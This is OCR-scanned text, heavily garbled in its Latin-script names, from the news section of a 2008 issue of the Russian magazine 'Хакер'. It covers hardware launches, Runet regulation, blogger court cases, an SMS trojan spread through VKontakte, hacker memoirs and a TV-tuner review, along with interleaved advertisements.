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в матчах «5РОКТ5™РІРА08»* 

М-Саде открывает вам мир захватывающих игр, 
созданных специально для мобильных устройств Ыокіа. 
Загружайте лучшие игры от самых известных разработчиков 
прямо в ваше устройство** или же через ПК, предварительно 
протестировав их перед покупкой. Станьте чемпионом среди 
друзей из соседнего дома или с другого конца света! 

п-даде.ш 
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ІПІГО 



Тамбовская группировка, межконтинентальная ракета 
«Сатана», «Газпром» и российские хакеры — вот четыре 
точки опоры международного авторитета России. 

С кем бы из иностранныхжурналистов и коллегя ни об- 
щался, всегда чувствую большой респект, когда говорю, 
что работаю в «(бе Наскегтадазіпе». Сразу сыплются 
вопросы о связи с российской мафией, отом, какименно 
были украдены два миллиона Евро на прошлой неделе и 
что делать, чтобы не подцепить какого-нибудь с любовью 
сделанного в Сибиритроя. 



Традиционно я им отвечаю, что журнал «Хакер» и есть 
координационный центр всех русскоязычных хакеров, 
я лично являюсь руководителем российской элект- 
ромафии, сибирскиетроиуже давно вшиты нашими 
агентами в Місго5о(( во все поставки ѴѴІпсІоѵѵв, начиная 
сверсииЗ.ІІ.а Большой Адронный Коллайдер — на 
самом деле европейский филиал редакции. 

Не всему, конечно, верят, но приятное чувство нацио- 
нальной гордости остается надолго :). 

шдЕвдл заж 
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МАРИЯ «МІРВІЦ.» НЕФЕДОВА 

/ МІГПІІ_І_@ПЕАІ_.ХАКЕР.ПІІ / 



Обо всем за последний месяц 




Зазвучит все! 



Сразу двумя звуковыми картами расшириласьхорошо 

знакомая всем линейка Боипс! Віазіег от компании 



Сгеабѵе. Первое решение — ІІБВ-звуковуха 
Х-РІ Со! — придется по душе геймерам. 
Новинка весит всего 20 граммов, обладает 
гигабайтом памяти и хранит в себе все 
необходимое дляустановки ПО. Она способна 
запомнить и установки, используемыедля различных 
игр, и сохранитьсведения о пройденных уровнях. Буквы 
Х-РІ в названии означают, что карточка умеет воспроизводить 
сверхреалистичный объемный звук. Технология Х-РІ Сгузбаіігег. 
в свою очередь, позволит«вернуть кжизни»те частоты, кото- 
рые были утрачены при перекодировке звука втакиеформаты 
какМРЗ, а Х-РІ СМББ-ЗБ эмулирует объемное звучание для 
любого аудио. Х-РІ Оо! поддерживает и широко распростра- 
ненную игровую технологию Сгеабѵе ЕАХАбѵапсесІ НО 4.0, 
а также позволяет изменять свой голос, общаясь в онлайне 
(благодаря функции ѴоісеРХ]. Вторая новинка, с говорящим 
названием Х-РІ ЫоіеЬоок, предназначена для пользователей 
ноутбуков, которые устал и путаться в проводах. Звук подается с 
карточки на беспроводной приемникСгеаііѵеѴѴІгеІевв Ресеіѵег, 
подключаемый к колонкам. Да здравствует мобильность! Зона 
приема составляет порядка 30 метров, правда, стоитзаметить, 
что принимающиеустройства продаются отдельно. Карточка 
совместима с форматом ЕхргеБвСагб.такчтоее можно ис- 
пользовать даже с самыми последними моделями лэптопов. 
Также Х-РІ ЫоіеЬоок«дружит»сОоІЬуи РТБ через программу 
РоѵѵегОѴО. Особенно это должно порадовать киноманов. 



Рігеіох 3.1 Ъеіа 1 оказался быстрее Соо§1е СЬготе по 
скорости загрузки страниц на 36 % 



Свежий воздух с ноутбуками Азиз 




РІовую и весьма интересную серию ноутбуков запускает 
компания А51І5. Линейка, получившая маркировку Ы, 
включаете себя четыре модели. Совсем маленький N10 
отличают размеры (диагональ дисплея всего 10.2", вес 

— 1 .40 кг), а также процессор Іпіеі Аіот. Модель N20 тоже 
весьма компактна — 12.1 " в диагонали, но главная ее осо- 
бенность — это время автономной работы, которое может 
достигать 12 часов! 

РІаибол ее универсальный N80 обладает экраном 14.1 " и 
может похвастаться видеокартой ЫѴЩІАОеРогсе 9 Бегіев 
с 1 Гб памяти. Ну, а старшая модель серии — N50, имеет 
сразу ряд преимуществ. Туги дополнительные клавиши с 
подсветкой, расположенные над клавиатурой, и большой 
экран, диагональю 15.4", и совсем уже уникальная вещь 

— встроенный ионизатор воздуха. Все ноутбуки осна- 
щены самыми последними достижениями прогресса. 
Например, системой БтагІБодоп, которая, при помощи 
встроенной веб-камеры, позволяетиспользовать для 
входа в систему идентификациюлица пользователя 
(вместо банального пароля). Конечно, не обошлось и без 
встроенной ОС Ехргевв Баіе. Такчто, пользоваться почтой, 
Скайпом, слушать музыку и делать многое другое, можно 
уже спустя, примерно, 8 секунд после включения машины, 
не дожидаясь за грузки основной ОС. Из других приятных 
особенностей отметим технологию Бирег НуЬгісІ Епдіпе 
(БНЕ), которая обеспечиваетвсем компьютерамлинейки 
крайне низкое энергопотребление. 
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КОМПЬЮТЕР НАЧИНАЕТСЯ С ІІМТЕІ 
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ы ВІРИАНт Эксперт на баз^ - ІТт| 
ого процессора Іпіеі ® Соге™2 Ілш 



Это лучшее решение для Вашего офиса! 



Наш Адрес: 394030, г. Воронеж, ул. К. Маркса, 67.. 
Тел (4732) 512-412. тт.папѵт.г и 



Сделай 

больше 



Корпорация Іпіеі не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждении или заявлении относительно 



конкретных компьютерных систем, упоминание о которых содержится в данном документе. 



©2008 г, Сеіегоп, Сеіегоп Іпзісіе, СепТгіпо, СепТгіпо Іпзісіе, логотип СепТгіпо, Соге Іпзісіе, логотип ІпТеІ, ІпТеІ, ІпТеІ Соге, ІпТеІ Іпзісіе, логотип ІпТеІ Іпзісіе, ІпТеІ Ѵііѵ, Іпіеі ѵРго, ІТапіит, ІТапіит Іпзісіе, Репііііт, Репііііт 
Іпзісіе, Ѵііѵ Іпзісіе, ѵРго Іпзісіе, Хеоп, и Хеоп Іпзісіе являются товарными знаками права на которые принадлежат корпорации ІпТеІ на территории США и других стран. Все права защищены. Реклама. 







На начало 



2008 



года количество юзер 



! рунета составило 32,7 



млн. человек. 




Аналитики прогнозируют, что Сооуіе СЬготе получит 



долю в 



15 - 20 % 



рынка в течение ^-хлет. 



Новый РЬоРокЬор 

Компания АбоЬе5узіетз выпустила долгожданную новую версию 
графического редактора всех времен и народов — РЬоІовбор С54. По 
словам представителей АсІоЬе5уз1етз, С$4 только начинает свой путь в 
направлении более эффективного использования ресурсов графичес- 
кого процессора, ноуже сейчас РбоІовЬор научился сего помощью мас- 
штабировать и вращать картинку, управлять трехмерным и объектами и 
производить цветокоррекцию. Так как работа с «железом «дело не та кое 
уж легкое, немного выросли системные требования — теперь рекомен- 
дуется видеокарта с 128 Мб оперативной памяти. Со временем плани- 
руется загрузить графический процессор еще и обработкой различных 
эффектов, но для этого будет выпущено специальное дополнение. Айз 
уже случившихся перемен назовем новую функцию «умного» масшта- 
бирования, оптимизированное создание панорам — теперь программа 
сама подгоняет границы снимков потонам и цветам, возможность 
редактирования свойств 30-объектов и, конечно, новый, переработан- 
ный интерфейс. Ктомуже, ѴѴІпсІоѵѵв-версия редактора, наконец-то, стала 
поддерживать 64-разрядные ОС. 



С таким 

не заблудишься 

Многофункциональный ЗР5-навигатор выпустила компания 
Ыехх. Модель NN5-5610 сочетает в себе практически все 
полезности, что могутпригодиться в машине. Обладая 
большим, 5-дюймовым, сенсорным дисплеем, девайс 
выполнен в минималистском стиле и может похвастаться 
толщиной всего 17 мм. В NN5-5010 используется навигаци- 
онная система І6о8 с поддержкой трехмерной картографии, 
— информация о маршруте подается на экран максимально 
удобно и доступно. Встроенная справочная система «Роіпів 
01 Іпіегеві» содержит данные на более чем 90.000 заве- 
дений по всей России, начиная от больниц и заканчивая 
кинотеатрами и ресторанами. Помимо этого, навигатор 
поддерживает50/ММС-карты памяти, а легким движением 
руки превращается в мультимедийный центр автомобиля, 
позволяя слушать музыку, просматривать изображения или 
фильмы. Еще одна приятная особенность — это ВІыеІооІЬ- 
модуль, синхронизировав который с мобильнымтелефоном, 
мы получаем Иапсізігее и возможность управлятьзвонками 
и 5М5 прямо на экране NN5-5010. В памяти устройства уже 
установлены карты всехосновныхтрасс и крупных городов 
нашей родины, но этот список всегда можно расширить |в 
том числе, добавив карты других регионов и стран]. 
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ГГ и благотворительность 



Компактные ноутбуки ЕееРС (один из главных хитов от компании Авиз] 
послужат благому делу и помогут в учебе школьникам Краснодар- 
ского края, Свердловской и Нижегородской областей. Произойдет 
это в рамках проекта «Компьютер для школьника». Он организован 
некоммерческим фондом «Вольное Дело», реализующим различные 
благотворительные программы предпринимателя Олега Дерипаски. 
Проект рассчитан на долгих пятьлет. Идея заключается в обеспечении 



учебныхзаведений самыми современными ІТ-наработками, будьто 
«железо» или софт. Так, российским школам планируется передавать 
порядка 200.000 компьютеров в год, и в 2008 это право на конкурсной 
основе выиграла именно компания Авив со своими нетбуками. Проект 
всячески поддерживает компания МісговоН (предоставили льготные 
условия на покупку своего ПО], а также Іпіеі (взялись обучать препода- 
вателей). 



1997 



года количество сайтов в рунете увеличилось с 



18 



тыс. до 



13 



млн. 
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ЧАСЫ РІЕВВЕ САВОШ 

РОЗЫГРЫШ КАЖДЫЙ ЧАС 



ПРАВИЛА 
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Яндекс занимает ЧО'Уо российского поискового рынка. 

Арріе мало глянца 




Странно развивается ѴѴіРі в России — 90 % всех точек 
доступа сосредоточены в Москве. 



Неприятности с Хэ-коробкой 

Суровая конкуренция рынка консолей диктует жесткие правила. Так корпорация МісговоД допус- 
тила в своихХЬохЗбО ряд непростительных ошибок, но отзывать товар из продажи и, тем более, 
признаваться в этом, не торопилась. «Мелкомягкие» покаялись в содеянном лишь в прошлом году, 
наконец, сознавшись, что аппаратное обеспечение приставок действительно далеко от совер- 
шенства, а процент априори неисправных консолей очень велик. На улучшения в этой области был 
выделен 1 млрд, долларов, и шумиха немного улеглась, но, как оказалось, ненадолго. На МісговоЙ 
снова подали в суд. Простой парень из Калифорнии (очевидно, по совместительству обиженный 
геймер] требует у корпорации ни много, ни мало — вернуть все деньги, полученные с момента нача- 
ла продаж консолей. Ссылается он при этом на многочисленные публикации 
в Сети и игровых изданиях. Дело в том, что согласно этим источни- - 

кам, в Місговоіі знали о дефектах еще в 2005 году, но не спешили 
что-либо предпринимать, продавая откровенный брак и дуря 
покупателям головы. Крайне сомнительно, что иск удовлетворят, 
но, похоже, старые грехи будут преследовать МісговоД еще долго. 



* 



Вследза недавним обновлением ІРосГов пришел черед меняться 
«яблочным» ноутбукам и мониторам. В ходе презентации незабвенный 
Стив Джобс поведал миру о постигших машинки трансформациях. 
Пожалуй, главной и самой спорной переменой стал новый глянцевый 
экран с 1_Е0-подсветкой и стеклом. Им оснастили и МасВоок, и МасВоок 
Рго, и новый 24-дюймовый монитор Арріе Сіпета 

Сііэріау. Дизайнерское сообщество, 
нежнолюбящее 



продукцию Арріе, всерьез обеспокоилось вопросами, какой теперь 
станет цветопередача и что делать с бликами. Словно в ответ, Арріе не- 
навязчиво отрекламировали подставку нового дисплея, позволяющую 
менять угол наклона от -5 до 25 градусов. Среди других перемен — стал 
алюминиевым корпус, (изготавливается по спецтехнологии из цельного 
куска упомянутого металла). Впервые эту разработку применили для 
МасВоок Аіг. Толщина и габариты машин немного уменьшились, а также, 
пусть незначительно, но изменился вес — как ни легок алюминий, плас- 
тикбыл полегче. Для всех моделей на39%увеличился размертачпада, 
и с него исчезла кнопка (стала виртуальной). Отметим также появление 
индикатора питания на боковой поверхности и замену клавиатуры на 
черный пластик. Плюс, в ходе запланированного перехода на видеоа- 
даптеры ІМѵісІіа, все МасВоок теперь щегол я ют СеРогсе’ами. «Прошки» 
вообще могут похвастаться сразу двумя видеокартами — интегрирован- 
ной и дискретной. Процессоры остались прежними: это ІпіеІСоге 2 Рио, 
с частотами 2. ОС Из или 2. 46 Нз, для МасВоок и 2.46Нг или 2. 536 Нт для 
МасВоокРго. Для «Про» также возможен варианте частотой 2.86Нз. 

Что до монитора, — он в некотором роде идет «в связке» 
с ноутбуками, имея портМіпі ОіврІауРогІ (новый 
стандартсигнального интерфейса для цифровых 
дисплеев, которым оснащены и портативы Арріе) и 
кабель МадВаІе, через который отСіпета Оівріау 
можно заряжатьлэптоп. 

Из всех линеек не обновилась только 17" модель 
МасВоок Рго, в которой, согласно инсайдерским слу- 
хам, обнаружили некие недоработки. Полноценное 
перерождение было отложено на неопределенный 
пока срок. Также не дождались появления привода 
Віи-Рау. Ничего не поде- 
лаешь, — сложности 
лицензирования!.. 
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Ваши способности. Наше вдохновение. 

Місгозоіі : 
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© 2008 Місгозоіі; Согрогайоп. Все права защищены. Владельцем товарных знаков Місгозо^, ѴізиаІ 51исІіо, 
зарегистрированных на территории США и/или других стран, и владельцем авторских прав на их дизайн 
является корпорация Місгозоіі. Другие названия компаний и продуктов, упомянутых в тексте, могут являться 
зарегистрированными товарными знаками соответствующих владельцев. Реклама 








Вредоносные файлы содержатся всего в 
1 , 09 % спамерских е-таіГов. 



Инет в законе 

Похоже, кто-то всеже рассказал нашему правительствуо существовании 
интернета, и интернет представителям власти сильно не понравился. 

Во всяком случае, в нынешнем виде. Депутаты рабочей группы фрак- 
ции «Единая Россия» за казал и Международному исследовательскому 
институту разработку концепции закона о регулировании интернета. 
Заниматься вопросом будет лично директор МИИ — АсламурТедеев. Он 
уже поделил все отношения в Сети на две группы: экономическую, вклю- 
чающую в себя сетевую коммерцию и банковскиеуслуги, и гуманитарную, 
охватывающую все остальное. Интересно, что если для первой группы 
собираются создавать правовую базу, защищающую права сторон, то для 
второй хотят соблюсти некий мистический баланс«публичных и госу- 
дарственных интересов». Тедеев считает, что никакого саморегулирова- 
ния в интернете быть не может, но в то же время заверяет, что повторять 
путь Китая или Кубы, конечноже, не намерен. Взбудораженные новостью 
юзеры самого Тедеева в рунете отыскали быстро... и ужаснулись. Вот 
выдержка из его профиля на сайте Виртуального клуба юристов. Орфог- 
рафия и пунктуация автора сохранены: «Я специализируюсь в облости 
Налогового, банковского и финансового права, налогообложения элек- 
тронных банковских услуг и сдел ок, совершаемых с помащью Интернет. 
Преподаю в АПУ, ВУЗах Москвы и Краснодара». Наше правительство, тем 



«Красная шапочка» 
осталась не удел 

Последние полгода «Почта России» активно пытается компьютери- 
зироваться и оптимизироватьза счет этого свои рабочие процессы. 
Вначале было заключено соглашение с компанией Веб Наі, в рамках 
которого ряд отделений экспериментально оснастили ПО на базе І_іпих. 

В случаеуспеха этого начинания, аналогичным софтом снабдили бы все 
почтовые филиалы, что позволило бы не только создать новую инфор- 
мационную инфраструктуру, но и существенно сократить расходы на 
содержание почтовых сетей — свободное ПО всеже стоит не в пример 
дешевле. Но фокус не удался. Либо работники «Почты России» не суме- 
ли совладать с программами, разработанными совместно со специалис- 
тами Реб Наі, либо их софт действительно не подошел для нашей инф- 
раструктуры... Об этом мы уже не узнаем. В итоге, все вернулось на круги 
своя, точнее к МісговоН. К настоящему моменту с софтверным гигантом 
заключено новое соглашение, та к что помогать нашим почтовикам в 
создании комплексной инфраструктуры (например, единого сервиса 
электронной почты и коммуникаций) будет именно он, «родной». И 
никакого вам І_іпих’а. 



временем, всерьез намеревается сделать этот документобразчиком для 
подражания, чтобы на него равнялись и другие страны. Даешь за коны 
без пробелов с «ашипками»! А лучше — давайте заодно подправим и 
правила русского языка. 



ЖЖ не пройдет 



иѵЕіоикнді 



Пока в Перми судят блогеров, в Казахстане «проблему 1_іѵебоигпаІ» решают с плеча — на- 
чиная с 7-го октября 2008 года, ведущие провайдеры страны просто заблокировали доступ 
к сайту. Юзеры дали знать, что без ЖЖ остались клиенты «Казахтелеком», К-Сеіі, ВееІ_іпе, 
«Интелсофт» и ОІІСАТ. Заодно доступа лишилась Киргизия, использующая каналы сосе- 
дей. 

Причины официально не называются, но по Сети ходит упорный слух, что виной всему 
политика, а точнее, блог Рахата Алиева — бывшего зятя правителя Казахстана Нурсултана 
Назарбаева. На родине Алиев заочно приговорен к тюремному сроку за похищение людей 
и вымогательство, и в виду этого находится в Австрии. Сайты Алиева уже неоднократно 
блокировались властями Казахстана, но он завел блог в ЖЖ — : а гіобаѵ.ПѵеіоигпаІ.сот . 
заявив: «Мы открыли свою страницу в Живом Журнале. Вы понимаете, что это означает: 
теперь, чтобы нас закрыть, вам нужно обрушить весь Ііѵеіоигпаі». Примерно это, похоже, 
и было сделано. Однако по другой версии, это просто технические неполадки, имеющие 
место со стороны ЖЖ. Хотя и это тоже никак не подтверждено официально. В любом случае, 
казахстанским и киргизским блогерам пока приходится пользоваться прокси, анонимайзе- 
рами или зеркалами. 
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Предложение для физических лиц — абонентов тарифных планов с предоплатной системой расчетов и стоимостью ѴѴАР-трафика 2,95 руб. с НДС и более за 10 Кб. 

На другие тарифные планы скидка не распространяется. При подключении скидки стоимость ѴѴАР-трафика составит 2,95 руб. днем и 1,475 руб. ночью (с НДС за 10 Кб). 
Скидка предоставляется за ежемесячную абонентскую плату в размере 30 руб. с НДС и плату за подключение в размере 10 руб. с НДС. Время действия скидки — 
ежедневно с 00.00 до 08.00 ч. Оборудование сертифицировано. Услуги лицензированы. На правах рекламы. 




Билайн” 



живи на яркой стороне 



Ночь в чате удалась! 

Тусовался с друзьями почти до утра, 

ведь теперь на ШАР-трафик ночью скидка 50% 



Чтобы получить скидку, набери *110*741#'" 

Узнай больше © Об 04 21 

ѵѵшдо.ЪееІіпе.ги 








2о тысяч за пост в блоге 



К штрафу в 20.000 рублей приговорил суд города Перми блогера Дмит- 
рия Ширинкина, по статье 207УК РФ (заведомо ложное сообщение об 
акте терроризм а]. Что характерно, в ходе процесса было решено, что 
все блоги Сети, по сути, являются СМИ, а каждый поств них прирав- 
нял и к сообщению. Конечно, право у нас не прецедентное, как в США, 
но все же подход интересный. Что до Ширинкина — «тот самый» пост, 
в самом деле, выглядел странным, хотя впоследствии автор и уверял, 
что это лишь литературное произведение. Дмитрий написал в ЖЖ 
(там он Іеігаох], что купил пистолет ТТ с затертыми номерами и далее 
— цитирую: «Я Вас всех ненавижу, я ненавижу Путина, ненавижу 
Каспарова, ненавижу Дом-2, ненавижу метро, ненавижу российскую 
провинцию. Я заберу с собой два-три десятка душ. Япоканерешил, 
в какой вуз города я пойду. Наверное, все-таки в политех. Я его нена- 
вижу. Хотя одинаково ненавижу и остальные «типа университеты». Я 
не на вижу людей. Вы у меня попляшете. На раскаленной сковород- 



порядка 



ІО 



млн. евро ежемесячно. 



Гипно-спам 



ке». На данный моментавтор перевел журнал в режим Ігіепсів опіу, 
предусмотрительно спрятав отлюбопытных глаз все старые записи 
и проиндексировав их спецтэгом, чтобы они не отображались даже в 
кэше Яндекса. Однако в единственном оставшемся публичным посте 
он пишет, что невиновен, хотя и не собирается более это обсуждать. 
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Специалисты антивирусной лаборатории РапсІаІ_аЬ5 обнаружили очень неприятную 
вещь — спам-сообщение, в котором применяются методы воздействия на подсо- 
знание. Немного утешает, что методы, если можно так выразиться, старые и добрые. 
С первого взгляда спам выглядитобычной рекламой, правда, картинка не статична 
— на экране с огромной скоростью сменяют друг друга четыре изображения. На трех 
из них написано «Виу» («Купи»), В поле зрения эта установка находится всего по 
10-46 миллисекунд, так что пользователь даже не осознает, что именно видит. Зато 
подсознание, конечно, это фиксирует. По данным РапОа ба Ьв, это первый сетевой 
прецеденте использованием таких технологий «зомби рования»! Эксперты весьма 
обеспокоены происходящим, потому как могут последовать и другие попытки, вы- 
полненные уже гораздо более изящно, а значит, более опасные. Почти во всем мире 
воздействие на подсознание посредством рекламы запрещено законом, но для 
спамеров закон, в общем-то, не писан. Выходит, все, что пока могут порекомендо- 
вать пользователям специалисты — не забывать про антивирусы, фильтры контента 
и спама. 



«Вконтакте» снова болеет 

Малварь все чаще стали распространять через социальные сети, и это не- 
удивительно — ведь они набирают все большую популярность, в том числе 
и в России. Но мобильный троян та ким способом тиражируется впервые! 

Активность совсем простенькогоТго]ап-5М5.02МЕ.Копоѵ.Ь обна- 
ружили в Лаборатории «Касперского», в чьих базах он числится еще с 
весны текущего года. Создатели вредоносной программки просто модер- 
низировали механизм доставки под социальную сеть«Вконтакте». Зайдя 
на сайт, пользователь получает от друга сообщение об акции, в рамках 
которой якобы можно получить бонус на счет своего сотового — от 500 до 
555 рублей. Для этого предлагается скачать и установить на телефон ОАѴА- 
программу. Вместо пополнения счета приложение рассылаетЗМЗ на 5 
коротких номеров, каждое из которых стоит порядка 250 рублей. Периоди- 
чески троянецтакже пытается заполучитьлогин и пароль новой жертвы 
для дальнейшего самораспространения (используя фальшивый клон 
«Вконтакте»]. Отметим, что подобное развитие событий в сфере мобиль- 
ного малваря Каврегвку І_аЬ. прогнозировали еще в середине года. Эта 
область вредоносного ПО развивается очень активно, а социальные сети 
— весьма благодатная почва. 
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А Большой Брат все-таки следит 



Старая шутка и любимая страшилка всех параноиков, 
выступающих против социальных сетей (мол, все это база 
данных ФСБ и за нами следят], ушла не та к уж далеко от 
правды. Должников отныне будут искать через интернет в 
целом и сайты «Одноклассники» и «Вконтакте» в частнос- 
ти. Этим займется Московское управление Федеральной 
службы судебных приставов. Они будут собирать через 
социальные сети информацию об имуществе задолжавших 
пользователей, а также «напоминать» им о долгах через 
означенные сайты. Ну, а с начала 2009 года оповещать о 
задолженностях станут еще в 5М5. Нельзя не упомянуть и 
о том, что в ближайшее время ФССП начнет переговоры с 
операторами сотовой связи, в целях получения доступа к 
информации о счетах владельцевтелефонов. При необхо- 
димости счета даже могут быть арестованы. Технический 
прогресс во всей своей красе. 




Особенности сетевой рекламы 

Сразу ряд новшеств образовался в сфере интернет-рекламы. Во-первых, 
компания боодіе добралась, наконец, до перспективной ниши онлай- 
новых игр и запустила бета-версию сервиса АсІВепве іп Оатев. Как не- 
сложно догадаться из названия, это одна из ветвей развития рекламной 
службы Ѳоодіе АсІВепве, предлагающей релевантную рекламу. Пока все 
будет подаваться в виде роликов, демонстрирующихся перед игрой, после 
прохождения стадий или же после проигрыша. До внедрения непос- 
редственно в игровые миры дело не дошло. Во-вторых, социальная сеть 
МуВрасе дала старт сервису МуАОв, ориентированному на малых предпри- 
нимателей и частных лиц. Легко определив в системе будущий бюджет 
рекламной компании (от 25 до 10.000 долла ров], любой человек сможет 
выбрать свою «целевую аудиторию», при помощи системы НурегТагдебпд. 
Она включаете себя свыше 1 100 критериев отбора, основанных на инфор- 
мации, опубликованной в профилях пользователей. Например, рекламу 
увидяттольколюди изопределенной географическойточки планеты, 
занесшие в интересы «морские обезьянки». Ты, кстати, не заносил? 




В сЫепсІег 

Удобство гклддыпястгя нт мучіочрй. 
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КОМПЬЮТЕРНЫЕ. ДНСЕССУДРЫ И ПЕРИФЕРИЯ 













Хакерское чтиво 

В последнее время стало очень модно писать мемуары. Занимаются этим все, кому 
нелень, начиная от голливудских звезд и заканчивая менеджерами среднего звена, 
которые ваяют исключительно «в стол». ІТ-андегаунд, очевидно, решил, что он 
ничем не хуже. О том, что биографическую книгу пишет легендарный Кэвин Митник, 
взломавший Пентагон и отсидевший 4 года за свое деяние, известно уже давно. 
Теперь в полку хакеров- писателей прибыло — в свет вышли мемуары Майкла Калса, 
под названием «Но\л/ 1 Сгаскеб Иге Іпіегпеі а псі ѴѴИу ІІ'зЗііІА Вгокеп» («Как я взломал 
интернет и почемуон до сих пор не работает»), написанные в соавторстве с журна- 
листом Крэйгом Сильверманом. Кале известен под ником МайаЬоу и знамен иттем, 
что в 2000 году он, в возрасте 15 лет, вместе с группой хакеров организовал 0о5-атаку 
на ряд крупных сайтов, включая СЫІМ, Атагоп.сот, еВау, УаИоо и Е*ТгасІе Ріпапсіаі. 
Влечение нескольких часов ресурсы были недоступны, и по оценкам некоторых 
аналитиков, атака обошлась мировой экономике в $1 .2 млрд. Калса поймали и 
осудили. Он получил 9 месяцев колонии для несовершеннолетних и испытательный 
срок длительностью 1 год, во время которого ему ограничили доступ к интернету. Но 
это происходило в далеком 2001 году. А сейчас повзрослевший хакер, переквали- 
фицировавшийся в журналисты (Кале вел колонку о компьютерной безопасности в 
канадской газете), решил в красках поведать миру о своих похождениях. 



Соо&іе научили слушать 

Компания Воодіеуже однажды пыталась запустить сервис, распознающий голос 
— назывался он (Зоодіе Ѵоісе БеагсИ. Экспериментальная новинка позволяла искать 
по телефону различные компании в пределах США. Тогда что-то не задалось, и 
работу системы довольно быстро свернули. Но где не преуспели американцы, подход 
придумалиукраинцы. Наши соседи написали бесплатный плагин к Іпбегпеб Ехріогег 
под названием Ѵоісе ЗеагсИ Ваг, скачать который можно по адресѵ ѵоісе5еагсІіЬаг. 
сот . Пока программа понимаеттолько английскую речь, но это обещают в скором 
времени поправить. Принцип аддона работы прост — произносим ключевое слово, 
жмем кнопку«поиск», и нас переадресует на сайт ѵоісевеагспЬаг.со-п . где выводятся 
результаты из Соодіе. К чему та кая мудреность? Во-первых, на сайте висит реклама, 
а каждая переадресация — это показы, во-вторых, чего еще ждать от проекта посвя- 
щенного Биллу Гейсту? Нет, это не шутка. Цитата, принадлежащая Билли, красуется 
на главной странице ресурса. Она гласит: «В МісгозоЙ считают, что через пять лет 
голосовых поисковых запросов в интернете будет больше, чем печатных». Утвержде- 
ние, нужно заметить, вполне здравое, да и программка тоже не самая бесполезная. 

Ломаешь? Ломай бесплатно! 

Как известно, исключения лишь подтверждают правила. Авторов 
крэков к различному софту, как правило, не удается ни вычислить, ни 
поймать, ни, тем более, осудить. И вот исключение произошло — при- 
чем, у нас, в России: сумели отыскать человека, взломавшего летом 
2008 популярную картографическую софтину«Навител навигатор». 

Скорее всего, хакер попался из-за возраста — Сергею Победино- 
ву всего 1 7, а главное, из-за того, что, распространяя взломанную 
программу через варезники и блоги, он просил пожертвоватьлюбую 
сумму на свой ѴѴеЬтопеу-кошелек. Из-за взлома Навител, лидер 
российского рынка картографического ПО, потерял порядка 1 5% от 
общего объема продаж. И хакера, подложившего компании такую 
свинью, действительно искали. Учитывая, что программа достаточно 
специфичная, а автор пытался заработать на крэке — нашли. Теперь 
Побединова могут даже привлечь куголовной ответственности, хотя 
до ареста дело не дошло — Навител пока разбирается с родителями 
юного гения, очевидно, пытаясь урегулировать инцидент миром (а 
вероятнее, штрафом). 
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МІСКО-ЗТАР? ІМТЕР?МАТЮЫАІ_ 



14 - 15 % поисковых запросов содержат 
различные ошибки и искажения. 

Фильтруем 
базар на лету 

МісгобоЙ славится тем, что частенько патентует совершенно 
очевидные вещи и впоследствии зарабатывает на этом. Например, 
так было с клавишами «радеир» и «радесіоѵѵп», колесом мышки и 
двойным кликом. Число патентов, принадлежащих корпорации, 
уже давно исчисляется тысячами, итеперь к ним добавился еще 
один — МісговоН получили патент за номером 7.437.290 на техноло- 
гию автоматической цензуры речи [АіЛотаІіс СепвогвЫр о( Аибіо 
Оаіа Іог Вгоасісазі]. На телевидении и радио практика «затирания» 
применяется широко и давно — как правило, вместо нежелатель- 
ного слова вставляется звук«пи-ип», или фраза попросту иска- 
жается. Удивить кого-либо анализом звукового потока в режиме 
реального времени сегодня тоже сложно. Но заменять нежелатель- 
ные слова прямо на лету еще никто не пытался. В свежем патенте 
значится совсем уж интересная вещь — нежелательные фразы 
предлагается не просто отлавливать, но автоматически подменять 
другими, более благозвучными. Остается только порадоваться 
тому, что в совершенстве синтезировать голос человека, исходя из 
его образца, все еще не научились. 
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Соглашайтесь 
только на 
лучшее! 

Системные платы М5І серии Р45 обеспечивают 
максимальную эффективность благодаря 
использованию микросхем ЭгМОБ серверного класса. 

Рабочая температура 



Дискретные МОП-транзисторы 



Р45 Оіатопсі 
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4 Поддержка процессоров Іпіеі Соге 2 
с возможностью разгона Р5В выше 
2000 МГц 

4 Поддержка памяти ООВЗ-2000 
л Вторичный источник питания на 
микросхемах ИгМОВ 
*■ Жидкостное охлаждение Сігси-Ріре 

* Поддержка АТІ Сго55рігеХ 

• Звуковая карта Х-Рі РЮ Аисііо 
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КИРИЛЛ АВРОРИН 



УЗВ-ТЕЛЕВИЗОР 



ТЕСТИРОВАНИЕ ВНЕШНИХ ТВ-ТЮНЕРОВ 



Сегодня мы порадуем тебя обзором и тестированием новейших ТѴ-тюнеров, 
подключающихся по ІІЗВ. 



етб-7 назад установка и конфигурация внутреннего 
ТВ-тюнера занимала до часа времени. Программы для 
просмотра радовали десятками багов, а мощности многих 
процессоров не хватало для обработки аналогового 
сигнала — например, такие полезные функции, как Тіте $ЬНТ, могли 
тянуть только самые мощные ЦП. Сейчастакой проблемы не сущес- 
твует. Даже наш тестовый, не самый мощный ноутбук легко тянул все 
предлагаемые современными ТВ-тюнерами функции. Но дело не 
в этом. Главная проблема, в которой не помогут даже самые крутые 
процессоры и гигабайты памяти — скудное содержание современных 
телеканалов! Во многих опросах интернет-пользователи отвечают, что 
почти не смотрятТВ. Возможно, это и обуславливает медленное раз- 
витие рынка ТВ-тюнеров. С другой стороны, если смотришьтелевизор 
не постоянно, а от случая к случаю, то зачем захламлять квартиру 
редко используемым громоздким ящиком? Не прощели подключить к 
компьютеру маленькую коробочку? 



И МЕТОДИКА ТЕСТИРОВАНИЯ 

У нас не оказалось поблизости телеантенны, и исследования мы проводили 
в квартире, используя ноутбук. Пусть он заметно слабее, чем наши тестовые 
стенды, но подтащить гигантский корпус с монитором в другую комнату было 
затруднительно. В принципе, для теста внешних ТВ-тюнеров вполнедоста- 
точно 2,5-гигагерцового Іпіеі Соге 2 Оио и 3 Гб памяти. 
Впроцессетестирования мы установили идущее в комплекте программное 
обеспечение, но только то, что было необходимо для настройки и просмотра 
передач. Обычно в комплекте поставляется еще множество дополнитель- 
ных утилит, но им внимания мы не уделял и — так как на результаты теста 
они бы не повлияли. Настраивались доступныетелеканэлы, оценивалось 
качество изображения, простота интерфейса утилиты, ее возможности и 
функции самого ТВ-тюнера. Если для начала работы надо был оустановить 
три программы, несколько утилит, патч и набор кодеков — такойтюнер никак 
не мог получить хорошей оценки. Столь простое устройство не должно быть 
сложным в настройке. 




